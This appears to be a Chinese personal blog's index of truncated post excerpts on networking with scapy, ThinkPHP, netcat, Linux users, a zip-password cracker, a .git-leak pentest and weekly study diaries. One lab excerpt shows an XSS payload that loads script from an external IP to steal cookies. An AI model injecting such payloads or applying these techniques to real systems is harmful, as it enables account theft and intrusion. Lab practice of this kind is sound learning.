whiteinblack

思路：手动构造一个指定大小的数据包，在IP首部设置强制不分片，根据返回的ICMP差错报文类型来判断数据包大小是否超过MTU如果返回数据包ICMP层的type==3,code==4则表明数据包已经超过了MTU如果返回数据包ICMP层的type==0,code==0则表明数据包可以成功发送,大小没有超过MTU在主函数中设置一个循环递减设置的数据包大小来探测MTU值代码：i...

思路：手动构造ICMP数据包，设置IP的flags和frag进行分片，通过id标识为同一个数据包代码：import sysimport logginglogging.getLogger("scapy.runtime").setLevel(logging.ERROR)#清除报错from scapy.all import *send(IP(flags=1,frag=0,id=...

首先查看路由记录如何运行的，那么先用GNS3搭建一个简易网络环境：设置好动态路由解析后开始查看：抓包分析：最大记录九个，其中第一个是自己的IP发送：接收：OK开始用python写路由记录功能：思路：众所周知ping是基于ICMP协议的1.发送ICMP数据包，在IP报头option中添加自己的IP，空出八个空位等待存放其他IP2.设置ICMP报文的ty...

主要思路：1.通过python psutil模块，并对网卡名称进行筛选得到对应网卡的IP地址和MAC地址2.使用scapy库中的srp()函数发送二层数据包并获得返回值3.使用type()函数分析返回值类型，查询对应的类中的方法，来提取关键信息发送包的属性可以在scapy中查询，如：查询本机对应网卡，IP，MAC 代码：import psutildef get_lo...

变量输出自定义变量输出：{$value}默认值输出:{$value|default='默认值'}系统变量：($Think.server/env/post/get/cookie/session/request)使用运算符需要注意：数学运算，.语法失效模板解析定界符（TMPL_L_DELIM、TMPL_R_DELIM）使用函数变量是第一个参数：{$vaule|f...

thinkPHP有四种URL模式，通过URL_MODEL配置：0：普通模式（http://domain/index.php?m=m&c=c&a=a）1：PathInfo(http://domain/index.php/m/c/a)2：ReWrite(http://domain/m/c/a)3：兼容模式1，2需要运行环境的支持使用U函数可以动态生成...

获取输入变量的几种方式：$_GET/$_POST/$_SERVER ThinkPHP框架提供了I函数，方便的实现了输入变量的读取，并自动进行数据安全过滤 Input函数：I（'变量类型.变量名',['默认值'],['过滤方法'],['额外数据源']）...

一、视图基本结构：默认视图层：（DEFAULT_V_LAYER） 模板文件后缀：(TMPL_TEMPLATE_SUFFIX) 连接符：(TMPL_FIEL_DEPR) 视图目录：(VIEW_PATH)二、视图变量赋值和渲染使用控制器的assign方法为视图变量赋值：assign('name',$value) 渲染视图：控制器display()方法，；fetch和show方法...

Think PHP控制器提供了以下几种方式实现页面跳转和响应redirect重定向 success成功提示跳转 error错误提示跳转 ajaxReturn实现Ajax数据返回控制器定义了六个常量，用来快速判断请求的类型，分别是IS_SET,IS_POST,IS_PUT,IS_DELETE，IS_AJAX,REQUEST_METHOD如果不是jQuery，提交Ajax请...

NETCAT功能总结：nc可以完成所有Telnet可以完成的工作 传输文本信息 传输文件/目录 加密传输文件 远程控制/木马 加密所有流量 流媒体服务器 远程克隆硬盘具体操作：NC——TELNETnc -vn [ip] [port]nc通信，取证：用kali2号监听4399端口用kali1号连接2号的4399端口：一号机简单取证发送给2号：...

此次练习主要是用mutillidae靶场实现了《白帽子讲web安全》上的xss payload 窃取用户cookie实例。需要创建两个用户进行测试：墨中白，test用账号墨中白进入xss blog练习页面：在文本框中插入代码<script type="text/javascript" src="http://47.116.10.120/wxx.js"></s...

       其实我学python的本心是用来开发工具的，有一个python实现的whois域名查询工具，过于简单就不写博客了，其实就是一个简单爬虫就能实现的功能。最近闲来无事发现工作室的招新试卷压缩包是经过加密的，以前爆破都是直接下载工具下载字典爆破的。终于可以自己写一个工具了哈哈。于是就开始写压缩文件爆破工具和社工字典生成工具。下面简单介绍下原理：压缩文件爆破工具：其实原理很简单，...

       此次渗透起源于我写了一个python的聊天脚本，tcp通信可以挂在外网上，但是udp通信接收不到消息，于是我想弄一台内网服务器运行我的服务端脚本转发消息。       使用AWVS对改服务器进行扫描：发现.git漏洞在GitHub上下载githack软件https://github.com/lijiejie/GitHack利用这个软件可以复原工程源码，再分析源码寻...

一、用户和组配置文件详解：/etc/passwd /etc/shadow    密码相关策略文件 Linux中用户分为三类：超级用户 root 系统用户 第三方程序使用某些功能产生的用户，不能登录（可在/etc/passwd 中查看其shell为sbin/nologin），一般系统会为其分配ID范围，可在/etc/login.defs中查看范围 普通用户 ...

        好久没写博客了,上次写博客还是在上学期.而且以前写博客都是写写一周做了些什么.这次分享一些自己学web渗透的一些心得吧(仅作个人心得,谨慎参照,有大佬路过还望指点一下~).此前一直在学Java web.这次趁着五一假期好好钻研了下web渗透.其实我一直觉得每个学计算机的人都有黑客梦,炫酷吊炸天啊......其实很早我就想学web安全.上学期在工作室学了一个学期的前端打了下基础.看了...

本周主要用bootstrap框架写了一个网页.没学什么新东西,本来想在网页上实现一个回到顶部的按钮功能由于元旦回家加上各种科目的复习以及情绪上的问题,没能实现,总的来说还是很匆忙的一周,由于周任务没写完在家也写了好久-_-...周一匆匆忙忙赶到工作室开会,大家都为我推迟了会议时间,我还是迟到了,很愧疚..元旦回家虽然没做什么,但还是解决了一些感情上的问题.转眼一学期就过去了啊,虽然不尽如人意,还是

本周主要学了bootstrap框架,感觉在bootstrap下写网页要方便很多也要麻烦很多,话语有些矛盾/笑哭.方便的话主要是写出来可以不用再去纠结响应式布局,麻烦的话当然就是class名称太多了,根本记不过来.很多实例跟着视频敲了一遍还是记不住,JavaScript部分更是难以理解,头大.再就是用了框架之后不太好改样式,总觉得改了之后会影响框架中的响应式布局.感觉需要大量的练习才能很熟练的掌握b

本周写了一个很简单的HTML5画布游戏,由于事情很多,做周任务的时间比较有限.没有加入理想中的人物跑动效果.感觉学JavaScript时间还是太短,毕竟再怎么说也是一门语言,掌握的很粗浅,特别是学完面向对象语言c++和java后感觉JavaScript中的定义对象很模糊.以后还是要找几本书研究研究.不管怎么说,这学期最黑暗的一周总算是过去了.下周开始学bootstrap框架.关于寒假任务的话,原本

本周在极客学院上学完了JavaScript,以及HTML5的画布.发现并不能很好的把JavaScript应用到HTML中.JavaScript中事件也比较多,很容易忘记,关于写一个网页游戏总体上也有了一个思路.就是实现一个简单的抓怪兽游戏吧,然后用给角色加上一个帧动画效果,实现上下左右跑动的时候动作会变化.时间不是特别够,还要复习大学物理,比较的仓促......下周任务:制作HTML5网页